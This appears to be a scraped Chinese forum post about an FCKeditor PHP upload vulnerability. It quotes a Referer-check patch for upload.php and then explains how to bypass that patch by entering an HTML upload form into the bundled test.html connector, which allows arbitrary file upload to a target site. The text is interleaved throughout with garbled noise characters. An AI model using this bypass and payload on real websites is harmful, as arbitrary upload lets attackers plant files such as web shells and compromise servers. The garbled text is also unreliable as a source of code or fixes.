漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php j" Q6 _$ V, B3 e- ]
网上给出的修复方案是0 e* @( d0 a0 S9 e2 X4 z
修复方法,删除FCK编辑器用其他的编辑器
6 y: W5 b5 N/ ^) G! y+ d或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
5 |% _4 `3 Q- R+ A# o E: [- k! o7 A在' b2 f. p0 a" R% L8 K3 z- \0 T
require(‘config.php’);
0 I4 k5 W/ f9 Q5 k$ K7 ?require(‘util.php’);8 M7 E; l2 N: _7 @
的下面添加以下代码—————————–
& m6 j C6 T7 v( S! T+ z0 M* D% ^//防止外部提交
1 ]9 F/ Z! f6 `8 T( K& Q! rfunction outsidepost()
! N5 h9 N+ |# o Q0 V0 v8 O{" l# v4 s" U! D, ?# C/ n
$servername=$_SERVER['SERVER_NAME'];& ^$ O+ z: D7 C/ Q
$sub_from=@$_SERVER['HTTP_REFERER'];
0 @: @9 f2 A2 P; Q# ?3 ^. l$sub_len=strlen($servername);8 d- Y% Z, r# a
$checkfrom=substr($sub_from,7,$sub_len);$ p, D9 h% g* S, V" j
if($checkfrom!=$servername){
9 P" v' ~6 \; T4 c5 Hecho(“you don’t outsidepost!”);" h3 u. Q7 t* d9 p* b
exit;, _7 m( k. a1 ]
}
6 `& Y" n6 V9 Z4 H}, e# w0 P1 m0 K# J" g
outsidepost();" P6 l3 H( O* z: w( x
防止外部提交,但是没有防止内部提交,
* b0 F* k7 }; O% k' z利用方法:( f0 R) o: w; a/ S$ ^
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
8 N6 z- f% t% h# [+ M, y2,在Current Folder 框输入 e# ?' Y! r: p3 ~7 U( {- O/ g
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>) F6 F& O2 I2 m6 K8 w
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
& p/ l: l$ k$ o8 h. OPS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |